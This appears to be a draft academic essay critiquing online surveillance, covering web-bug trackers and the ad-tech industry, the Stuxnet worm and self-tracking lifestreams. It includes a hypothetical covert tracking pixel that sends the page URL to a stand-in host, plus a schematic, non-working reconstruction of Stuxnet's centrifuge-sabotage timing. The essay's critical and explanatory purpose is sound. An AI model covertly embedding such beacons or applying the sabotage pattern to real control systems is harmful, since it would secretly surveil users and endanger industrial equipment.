Later web bugs (web 2.0) are not included here due to the complexity and length of the code (but see the 3rd-party elements, or ‘3pes’, at http://www.knowyourelements.com/ ).[5] It is noticeable that this code is extremely opaque and difficult to understand, even for experienced computer programmers. Indeed, one suspects an element of obfuscation, a programming technique that reduces the readability of the code in order to shield the company from observation. So far, in checking a number of web bugs on a variety of websites, I have been unable to find one that supplies any commentary on what exactly the code is doing, beyond a short privacy policy statement. Again, Ghostery (2012b) usefully supplies us with some general information on the web bug, such as the fact that it has been found on over 100,000 websites across the Internet, and that the data collected is 'anonymous (browser type), pseudonymous (IP address)'; the data is not shared with third parties, but no information is given on data retention policies. As of 2nd March, 2012, Ghostery reported that it was tracking 829 different web bugs across the Internet. This is a relatively unregulated market in user behaviour tracking and data collection, which currently has a number of self-regulatory bodies, such as the Network Advertising Initiative (NAI). As Madrigal reports: 'In essence, [the NAI] argued that users do not have the right to *not* be tracked. &amp;quot;We've long recognized that consumers should be provided a choice about whether data about their likely interests can be used to make their ads more relevant,&amp;quot; [they] wrote. &amp;quot;But the NAI code also recognizes that companies sometimes need to continue to collect data for operational reasons that are separate from ad targeting based on a user's online behavior.&amp;quot;… Companies &amp;quot;need to continue to collect data,&amp;quot; but that contrasts directly with users' desire &amp;quot;not to be tracked&amp;quot;' (Madrigal, 2012).&amp;lt;br&amp;gt; &lt;br /&gt;
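&lt;br /&gt;
To return to the point about obfuscation: the sketch below is an invented, schematic illustration (the tracker URL and function name are hypothetical, and no real company's code is reproduced) of how even a trivial pixel-beacon call becomes hard to read once minified or deliberately obfuscated: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;// Readable form (hypothetical): report the current page to a tracker. &lt;br /&gt;
function reportVisit() { &lt;br /&gt;
  var pixel = new Image(1, 1); // requesting the image transmits the data &lt;br /&gt;
  pixel.src = 'http://tracker.example/ping?page=' + encodeURIComponent(location.href); &lt;br /&gt;
} &lt;br /&gt;
&lt;br /&gt;
// The same logic after typical minification/obfuscation: &lt;br /&gt;
(function(l){var i=new Image(1,1);i.src='http://tracker.example/ping?page='+encodeURIComponent(l.href)})(location);&amp;lt;/pre&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Production trackers layer variable renaming, string encoding and dynamic script injection on top of this, which is part of what makes such code so resistant to casual inspection. &lt;br /&gt;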
&lt;br /&gt;
&amp;lt;br&amp;gt; These web bugs, beacons, pixels, and tags, as they are variously called, form part of the dark-net surveillance network that users rarely see, even though it is profoundly changing their experience of the internet in real-time by attempting to second-guess, tempt, direct and nudge behaviour in particular directions. Ghostery ranked the web bugs in 2010 and identified the following as the most frequently encountered (above average): Revenue Science (250x), OpenX (254x), AddThis (523.6x), Facebook Connect (529.8x), Omniture (605.7x), Comscore Beacon (659.5x), DoubleClick (924.4x), QuantCast (1042x), Google Adsense (1452x), Google Analytics (3904.5x) (Ghostery, 2011). As can be seen from the relative frequency of these encounters, Google is clearly the biggest player by a long distance in the area of user statistics collection. This data is important because, as JP Morgan's Imran Khan explained, a unique visitor is worth $189 to [http://www.businessinsider.com/blackboard/amazon Amazon] (e-commerce) and $24 to [http://www.businessinsider.com/blackboard/google Google] (search), and although Facebook (social networking) generates only $4 per user, this is a rapidly growing number (Yarrow, 2011). Keeping and holding these visitors, through real-time analytics, customer history, behavioural targeting, etc. is increasingly becoming extremely profitable. Ghostery (2010) has performed a useful analysis of their web bug database that attempts to categorise the web bugs found into 16 different types, which I have re-categorised into four main types: (1) Advertiser/Marketing Services, (2) Analysis/Research Services, (3) Management Platforms, (4) Verification/Privacy Services: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
1. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Advertiser/Marketing Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Advertiser: A company sponsoring advertisement and ultimately responsible for the message delivered to the consumer. Example: [http://www.att.com/ AT&amp;amp;amp;T] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Exchange: A provider of a marketplace connecting advertisers to ad networks and data aggregators (online and off), often facilitating multiple connections and bidding processes. Example: [http://www.rightmedia.com/ Right Media]&amp;amp;nbsp; &amp;amp;nbsp; &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Network: A broker, and often technology provider, connecting advertisers and publishers (web site operators). Example: [http://www.burstmedia.com/ Burst Media]&amp;lt;br&amp;gt; &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Publisher: Website operator who displays ads for advertiser(s) in various types of campaigns. Example: [http://www.nytimes.com/ The New York Times]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
2. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Analysis/Research Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Online Data Aggregator: Collects data from online publishers and provides it to advertisers either directly or via exchange. Example: [http://www.bluekai.com/ BlueKai] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Offline Data Aggregator: Collects data from a range of offline sources and provides data to advertisers directly or via exchange. Example: [http://www.experian.com/ Experian] &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Optimizer: Provider of analytics technology and services for ROI assessment and content optimization purposes. Example: [http://www.roilabs.com/ ROILabs] &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Research: Collects data for market research purposes where no ads are served using this data. Example: [http://www.safecount.net/ Safecount] &lt;br /&gt;
*e.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Analytics Provider: Provider of cross-platform statistical analysis to understand market effectiveness and audience segmentation. Example: [http://www.google.com/analytics/ Google Analytics] &lt;br /&gt;
*f.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Retargeter: Providers of technologies that allow publishers to identify their visitors when they place ads on third party sites. Example: [http://www.fetchback.com/ Fetchback]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
3. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Management Platforms''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Demand-Side Platform: A technology provider that allows marketers to buy inventory across multiple platforms or exchanges. DSPs often layer in custom optimization, audience targeting, real-time bidding and other services. Example: [http://www.invitemedia.com/ Invite Media]&amp;lt;br&amp;gt; &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Supply-Side Platform: A technology provider that allows publishers to access advertiser demand across multiple platforms or exchanges.&amp;amp;nbsp; SSPs often layer in custom yield optimization, audience creation, real-time bidding and other services. Example: [http://www.admeld.com/ AdMeld]&amp;lt;br&amp;gt; &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Ad Server: Technology that delivers and tracks advertisements independently of the web site where the ad is being displayed. Example: [http://www.doubleclick.com/ DoubleClick DART]&amp;lt;br&amp;gt; &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Agency: Provider of creative and buying services (both audience and data) for advertisers. Example: [http://www.mediacom.com/en/home.aspx MediaCom]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
4. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Verification/Privacy Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Ad Verification: Certifies or classifies webpages in an effort to prevent advertisers’ campaigns from running on unsavory or blocked content, and/or protects advertisers from having other companies run their ads incorrectly. &amp;amp;nbsp;Example: [http://www.clickforensics.com/ ClickForensics] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Online Privacy: Technology providers that deliver information and transparency to consumers on how 3rd party companies gather and use their data. Example: [http://www.betteradvertising.com/ Better Advertising]&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &amp;lt;br&amp;gt; [[Image:LUMAadvertising.jpg|left|500x450px|Image 1: Display Advertising Technology Landscape (Luma, 2010)]] &amp;lt;br&amp;gt; ''Image 1: Display Advertising Technology Landscape (Luma, 2010)''&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &amp;lt;br&amp;gt; Ghostery gives a useful explanation of how these companies interoperate to perform a variety of services for advertising and marketing clients: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;A company like [http://www.turn.com/ Turn Media] is a technology provider that allows marketers to buy inventory across multiple platforms or exchanges, or a Demand-Side Platform. They provide services for marketers and agencies to centrally manage buying, planning, targeting, and optimizing media opportunities. Reasonably speaking, however, you could also technically classify them as an Optimizer because this process is included under the umbrella of the platform. Turn [Media] is deeply data driven and partners with multiple data providers including [http://www.bluekai.com/ BlueKai], [http://www.targusinfo.com/ TargusInfo], [http://www.exelate.com/new/index.html eXelate], and others (Ghostery, 2010). &amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Of course, one element missing from this typology is that of surveillance, and indeed it is no surprise that web bugs form part of the tracking technologies used by companies to monitor staff. For example, in 2006 Hewlett Packard used web bugs from [http://readnotify.com/ readnotify.com] to trace insider leaks to the journalist Dawn Kawamoto, and later confirmed in testimony to a U.S. House of Representatives subcommittee that it is ‘still company practice to use e-mail bugs in certain cases’ (Evers, 2006; Fried, 2006). &lt;br /&gt;
&lt;br /&gt;
As can be seen, this is an extremely textured environment that currently offers little in terms of diagnosis or even warnings to the user. The industry itself, which prefers the term ‘clear GIF’ to web bug, is certainly keen to avoid regulation, and keeps itself very much to itself in order to avoid attracting too much unwanted attention. Some of the current discussions over the direction of regulation on this issue have focused on the ‘do not track’ flag, which would signal a user's opt-out preference within an HTTP header. Unfortunately, very few companies respect the ‘do not track’ header, and there is currently no legal requirement that they do so in the US, or elsewhere (W3C, 2012). One can also see in this context the current debate over the EU ePrivacy Directive, where the Article 29 Working Party (A29 WP) has stated that ‘voluntary plans drawn up by Europe's digital advertising industry representatives, the European Advertising Standards Alliance (EASA) and IAB Europe, do not meet the consent and information requirements of the recently revised ePrivacy Directive’ (Baker, 2012). [Eds: would this final point be better in a footnote?]&amp;amp;nbsp; &lt;br /&gt;
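&lt;br /&gt;
Technically, the ‘do not track’ signal itself is trivial: a compliant browser simply adds a one-line DNT: 1 header to each request and exposes the preference to page scripts. Whether anything honours it is entirely up to the recipient, as this minimal sketch of a script that voluntarily checks the flag makes clear (the property was still vendor-prefixed in some browsers at the time of writing): &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;// Check the user's Do Not Track preference before loading a tracker. &lt;br /&gt;
var dnt = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack; &lt;br /&gt;
if (dnt === '1' || dnt === 'yes') { &lt;br /&gt;
  // Respect the opt-out: load no tracking code. &lt;br /&gt;
} else { &lt;br /&gt;
  // Nothing compels this branch to behave differently; most trackers &lt;br /&gt;
  // simply never perform the check at all. &lt;br /&gt;
}&amp;lt;/pre&amp;gt; &lt;br /&gt;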
&lt;br /&gt;
One of the newer, and perhaps indicative, directions of travel for these web bugs is [http://www.persianstat.ir/ PersianStat], an Iranian web tracking and data analytics service which claims to keep 'an eye on 1091622 websites'; it shows that this new code ecology is not purely a Western phenomenon. With the greater use of computational networked devices in everyday life, from mobile phones to GPS systems, these forms of tracking will only become more invasive and aggressive in collecting data from our everyday encounters. Indeed, it is unsurprising to find that Americans, for example, are not comfortable with the growth in the use of these tracker technologies. Pew (2012) found: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;that 73 percent of Americans said they would 'not be okay' with being tracked (because it would be an invasion of privacy)… Only 23 percent said they'd be 'okay' with tracking (because it would lead to better and more personalized search results)… Despite all those high-percentage objections to the idea of being tracked, less than half of the people surveyed -- 38 percent -- said they knew of ways to control the data collected about them. (Garber, 2012; Pew, 2012).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This contradiction, between the ability of these computational systems and surfaces to supply a commodity to the user and the need to raise income through the harvesting of data that is in turn sold to advertisers and marketing companies, shows that this is an unstable situation. It also serves to demonstrate the extent to which users are simply not aware of the subterranean depths of their computational devices, and the ability of these general computing platforms to disconnect the user interface from the actual intentions or functioning of the device whilst giving the user the impression that they remain fully in control of the computer. As Garber observes, ‘underground network, surface illusion… How much do we actually want to know about this stuff? Do we truly want to understand the intricacies of data-collection and personalization and all the behind-the-screen work that creates the easy, breezy experience of search ... or would we, on some level, prefer that it remain as magic?’ (Garber, 2012). This issue is helpfully illustrated by the next case study, of the Stuxnet worm, which shows the extent to which the magic of software can conceal its true function. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Stuxnet'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Stuxnet[6] is a computer worm which experts now believe was aimed at the Iranian uranium-enrichment facility at Natanz, Iran.[7] The Stuxnet worm, a subclass of computer virus, copied itself repeatedly across computer systems until it found a host that met its ‘strike conditions’, that is, the location it was designed to attack, whereupon it activated its ‘digital warhead’, which may monitor, damage, or even destroy its target. The name ‘Stuxnet’ is ‘derived from some of the filename/strings in the malware - mrxcls.sys, mrxnet.sys’: the first part, 'stu', comes from the (.stub) file, mrxcls.sys; the second part, 'xnet', comes from mrxnet.sys (Kruszelnicki, 2011; mmpc2, 2010). Due to the sophistication of the programming involved, this worm is considered to have reached a new level in cyberwarfare. Stuxnet has been called the first 'weaponized' computer virus, and it would have required huge resources, such as a test facility to model a nuclear plant, to create and launch (Cherry, 2010). As Liam O Murchu, an operations manager for Symantec, explained: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Unlike the millions of worms and viruses that turn up on the Internet every year, this one was not trying to steal passwords, identities or money. Stuxnet appeared to be crawling around the world, computer by computer, looking for some sort of industrial operation that was using a specific piece of equipment, a Siemens S7-300 programmable logic controller. (60 Minutes, 2012b).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;The Stuxnet worm works by undertaking a very complex stealth infection, and covers its tracks by recording data from the nuclear processing system which it then plays back to the operators to disguise the fact that it is actually gently causing the centrifuges to fail. This is known as a ‘man-in-the-middle attack’ because it fakes industrial process control sensor signals so that an infected system does not exhibit abnormal behaviour and therefore does not raise an alarm. Again, cleverly, the faults it creates in the plant are likely to occur weeks after the sabotage, and in a targeted way, through the fatiguing of the motors – this looks like a standard failure rather than an attack. Indeed, Iran later confirmed that a number of its centrifuges had been affected by an attack (CBS News, 2010). A ‘senior Iranian intelligence official said an estimated 16,000 computers were infected by the Stuxnet virus’ (Associated Press, 2012). The Stuxnet worm is also interesting because it has built-in ''sunset code'' that causes the worm to erase itself after 24 June, 2012, and hence hide its tracks. As Zetter explains: &lt;br /&gt;
&amp;lt;blockquote&amp;gt;once the code infects a system, it searches for the presence of two kinds of frequency converters made by the Iranian firm Fararo Paya and the Finnish company Vacon, making it clear that the code has a precise target in its sights… Stuxnet begins with a nominal frequency of 1,064 Hz… then reduces the frequency for a short while before returning it back to 1,064 Hz… Stuxnet [then] instructs the speed to increase to 1,410 Hz, which is 'very close to the maximum speed the spinning aluminum IR-1 rotor can withstand mechanically',… [but] before the rotor reaches the tangential speed at which it would break apart… within 15 minutes after instructing the frequency to increase, Stuxnet returns the frequency to its nominal 1,064 Hz level. Nothing else happens for 27 days, at which point a second attack sequence kicks in that reduces the frequency to 2 Hz, which lasts for 50 minutes before the frequency is restored to 1,064 Hz. Another 27 days pass, and the first attack sequence launches again, increasing the frequency to 1,410 Hz, followed 27 days later by a reduction to 2 Hz. (Zetter, 2011)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
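&amp;lt;br&amp;gt; Zetter's description amounts to a simple periodic state machine. The sketch below is emphatically ''not'' Stuxnet's code – the real payload was written for Siemens programmable logic controllers, not a web language – but a schematic reconstruction of the attack timing she describes, using hypothetical helper functions (setFrequency, wait), to show how little logic the sabotage sequence itself requires: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;// Schematic reconstruction (not actual Stuxnet code) of the attack &lt;br /&gt;
// timing described by Zetter (2011). &lt;br /&gt;
var NOMINAL = 1064, OVERSPEED = 1410, UNDERSPEED = 2; // frequencies in Hz &lt;br /&gt;
while (true) { &lt;br /&gt;
  setFrequency(OVERSPEED);   // stress rotors near their mechanical limit &lt;br /&gt;
  wait(15, 'minutes'); &lt;br /&gt;
  setFrequency(NOMINAL);     // restore before the damage becomes obvious &lt;br /&gt;
  wait(27, 'days'); &lt;br /&gt;
  setFrequency(UNDERSPEED);  // second sequence: near stand-still &lt;br /&gt;
  wait(50, 'minutes'); &lt;br /&gt;
  setFrequency(NOMINAL); &lt;br /&gt;
  wait(27, 'days');          // and the cycle repeats &lt;br /&gt;
}&amp;lt;/pre&amp;gt; &lt;br /&gt;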
&amp;lt;br&amp;gt; Stuxnet disguises all of this activity by overriding the data control systems and sending commands to disable warning and safety controls that would normally alert plant operators to these dangerous frequency changes. Stuxnet is intriguing because it is not a general purpose attack, but designed to unload its digital warheads under specific conditions against a specific threat target. It is also remarkable in the way in which it disengages the interface, the screen for the user, from the underlying logic and performance of the machine. &lt;br /&gt;
&lt;br /&gt;
Indeed, there has been a great deal of speculation about whether a state would have been required to develop it, due to the complexities involved in being able to test such a worm before releasing it into the wild (Markoff and Sanger, 2010). Richard Clarke, the former chief of counter-terrorism under Presidents Clinton and Bush, argues that the built-in fail-safes are an important clue to Stuxnet’s source and that they point to the kinds of procedures found in a Western government. He says, ‘If a [Western] government were going to do something like this…then it would have to go through a bureaucracy, a clearance process, [and] somewhere along the line, lawyers would say, “We have to prevent collateral damage,” and the programmers would go back and add features that normally you don’t see in the hacks. And there are several of them in Stuxnet’ (Gross, 2011). Indeed, the complexities and structure of the worm are such that at least thirty people would have needed to be working on it simultaneously in order to build a worm of this kind (Zetter, 2010). This is especially true of a worm that launched a so-called ‘zero-day attack’, that is, one using a set of techniques that are neither public nor known to the developer of the attacked system, in this case Microsoft and Siemens. In fact, Stuxnet was remarkable for exploiting four different zero-day vulnerabilities (Gross, 2011). Because of the layered approach to its attack and the detailed knowledge required of Microsoft Windows, SCADA (Supervisory Control And Data Acquisition) and PLC (Programmable Logic Controller) systems, this would have been a very large project to develop and launch. Indeed, Eric Byres, chief technology officer for Byres Security, has stated: ‘we’re talking man-months, if not years, of coding to make it work the way it did' (quoted in Zetter, 2010). &lt;br /&gt;
&lt;br /&gt;
The two chief capabilities of Stuxnet are: (1) to identify its target precisely, using a number of software-based markers that give away the physical identity of the location – indeed, ‘attackers [had] full, and I mean this literally, full tactical knowledge of every damn detail of [the Natanz] plant’ (60 Minutes, 2012b); and (2) to disengage control systems from physical systems and to effect a stealth infection of the computer system that would fool the operators of the plant (the ‘man-in-the-middle attack’ described above). This was achieved through the use of two ‘digital warheads’, called 417 and 315. The smaller, 315, was designed to slowly reduce the speed of the rotors, leading to cracks and failures; the second, larger warhead, 417, manipulated valves in the centrifuges, faking industrial process control sensor signals by modelling the centrifuges, which were grouped into 164 cascades (Langner, 2011). Indeed, Langner (2011) described this evocatively as ‘two shooters from different angles’. The Stuxnet worm was launched some time in 2009/2010 and shortly afterwards:[8] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;the all-important centrifuges at Iran's nuclear fuel enrichment facility at Natanz began failing at a suspicious rate. Iran eventually admitted that computer code created problems for their centrifuges, but downplayed any lasting damage. Computer security experts now agree that code was a sophisticated computer worm dubbed Stuxnet, and that it destroyed more than 1,000 centrifuges. (60 Minutes, 2012a) &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; The origin of the name Stuxnet is hypothesized from an analysis of the approximately 15,000 lines of programming code. This analysis was a close reading and reconstruction of the programming logic, taking the machine code, disassembling it, and then attempting to convert it into the C programming language. The resulting code could then be analysed for system function calls, timers, and data structures, in order to try to understand what it was doing (Langner, 2011). Indeed, as part of this process a reference to 'Myrtus' was discovered, and the link made to 'Myrtus as an allusion to the Hebrew word for Esther. The Book of Esther tells the story of a Persian plot against the Jews, who attacked their enemies pre-emptively' (Markoff and Sanger, 2010).[9] Whilst no actor has claimed responsibility for Stuxnet, there is a strong suspicion that either the United States or Israel had to be involved in the creation of such a sophisticated attack virus. Its attack appears to have been concentrated on a number of selected areas, with Iran at the centre (see table 1).&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &amp;lt;br&amp;gt; [[Image:BerryStuxnet.jpg|left|500x450px|Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al n.d.)]] &lt;br /&gt;
&lt;br /&gt;
**Iran -&amp;amp;nbsp;52.2% &lt;br /&gt;
**Indonesia -&amp;amp;nbsp;17.4% &lt;br /&gt;
**India -&amp;amp;nbsp;11.3% &lt;br /&gt;
**Pakistan -&amp;amp;nbsp;3.6% &lt;br /&gt;
**Uzbekistan -&amp;amp;nbsp;2.6% &lt;br /&gt;
**Russia -&amp;amp;nbsp;2.1% &lt;br /&gt;
**Kazakhstan -&amp;amp;nbsp;1.3% &lt;br /&gt;
**Rest of World -&amp;amp;nbsp;9.4%&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
''Table 1: Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al n.d.).'' &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;Clearly, this kind of attack could be mobilized against targets other than nuclear enrichment facilities, and indeed the stealth and care with which it attempts to fool the operators of the plants shows that computational devices will undoubtedly be targets for monitoring, surveillance, control and so forth in the future. But, of course, once the code for undertaking this kind of sophisticated cyberattack is out in the open, it is relatively trivial to decode it and so learn, in a very short time, techniques that would otherwise have taken many years to develop. As Sean McGurk explains, ‘you can download the actual source code of Stuxnet now and you can repurpose it and repackage it and then, you know, point it back towards wherever it came from’ (60 Minutes, 2012b). Indeed, a different worm, called Duqu, has already been discovered, albeit one whose purpose is linked to the collection of data on industrial control systems and structures: a so-called ‘Trojan’ (Hopkins, 2011).[10] As Alexander Gostev reports: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;There were a number of projects involving programs based on the 'Tilded' [i.e. Stuxnet] platform throughout the period 2007-2011. Stuxnet and Duqu are two of them – there could have been others, which for now remain unknown. The platform continues to develop, which can only mean one thing – we’re likely to see more modifications in the future. (2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; The increased ability of software and code, via computational devices, to covertly monitor, control and mediate – both positively and negatively – is not just a matter of interventions that deceive the human and non-human actors who make up part of these assemblages. In the next section I want to look at the willing compliance with data collection, indeed the enthusiastic contribution of real-time data to computational systems, as part of the notion of lifestreams, and more particularly the quantified-self movement. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Lifestreams'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Lastly, I want to connect these developments in web bugs and worms with the growth in the use of self-monitoring technologies called lifestreaming, or the notion of the quantified self.[11] These have expanded in recent years as ‘real-time stream’ platforms, like Twitter and Facebook, have grown. Indeed, some argue that ‘we’re finally in a position where people volunteer information about their specific activities, often their location, who they’re with, what they’re doing, how they feel about what they’re doing, what they’re talking about…We’ve never had data like that before, at least not at that level of granularity’ (Rieland, 2012). This has been usefully described by the ''Economist'', which argues that the &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;idea of measuring things to chart progress towards a goal is commonplace in large organisations. Governments tot up trade figures, hospital waiting times and exam results; companies measure their turnover, profits and inventory. But the use of metrics by individuals is rather less widespread, with the notable exceptions of people who are trying to lose weight or improve their fitness…But some people are doing just these things. They are an eclectic mix of early adopters, fitness freaks, technology evangelists, personal-development junkies, hackers and patients suffering from a wide variety of health problems. What they share is a belief that gathering and analysing data about their everyday activities can help them improve their lives—an approach known as “self-tracking”, “body hacking” or “self-quantifying”. (2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This phenomenon of using computational devices to monitor health signals and to feed them back into calculative interfaces, data visualisations, real-time streams, etc. is the next step in social media. It closes the loop of personal information online which, although it remains notionally private, is stored and accessed by corporations who wish to use this biodata for data mining and innovation surfacing. For example: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;The Zeo [headband], for example, has already generated the largest-ever database on sleep stages, which revealed differences between men and women in REM-sleep quantity. Asthmapolis also hopes to pool data from thousands of inhalers fitted with its Spiroscout [asthma inhaler] sensor in an effort to improve the management of asthma. And data from the Boozerlyzer [alcohol counting] app is anonymised and aggregated to investigate the variation in people’s response to alcohol. (Economist, 2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; The lifestream was originally an idea of David Gelernter and Eric Freeman in the 1990s (Freeman, 1997; Gelernter, 2010), who described it as: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;a time-ordered stream of documents that functions as a diary of your electronic life; every document you create and every document other people send you is stored in your lifestream. The tail of your stream contains documents from the past (starting with your electronic birth certificate). Moving away from the tail and toward the present, your stream contains more recent documents --- papers in progress or new electronic mail; other documents (pictures, correspondence, bills, movies, voice mail, software) are stored in between. Moving beyond the present and into the future, the stream contains documents you ''will'' need: reminders, calendar items, to-do lists. You manage your lifestream through a small number of powerful operators that allow you to transparently store information, organize information on demand, filter and monitor incoming information, create reminders and calendar items in an integrated fashion, and &amp;quot;compress&amp;quot; large numbers of documents into overviews or executive summaries. (Freeman, 2000)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Gelernter originally described these as ‘chronicle streams’ (Gelernter, 1994), highlighting both their narrative and temporal dimensions related to the storage of documentation and texts. Today we are more likely to think of them as ‘real-time streams’ and the timeline functions offered by systems like Twitter, Facebook and Google+. These are increasingly the model of interface design that is driving innovation in computation, especially in mobile and locative technologies. However, in contrast to the document-centric model that Gelernter and Freeman were describing, there are also the micro-streams of short updates epitomized by Twitter, with its short, text-message-sized 140-character updates. Nonetheless this is still enough text space to incorporate a surprising amount of data, particularly when geodata, images, weblinks, and so forth are factored in. Stephen Wolfram was one of the first people to collect his data systematically, starting in 1989. As he explains: 'So email is one kind of data I’ve systematically archived. And there’s a huge amount that can be learned from that. Another kind of data that I’ve been collecting is keystrokes. For many years, I’ve captured every keystroke I’ve typed—now more than 100 million of them' (Wolfram, 2012). &lt;br /&gt;
&lt;br /&gt;
This kind of self-collection of data is certainly becoming more prevalent and, in the context of reflexivity and self-knowledge, it raises interesting questions. The data collected can also be relatively large in scale and unstructured. Nonetheless, better data management and techniques for searching and surfacing information from unstructured or semi-structured data will no doubt prove revealing about our everyday patterns in the future.[12] &lt;br /&gt;
&lt;br /&gt;
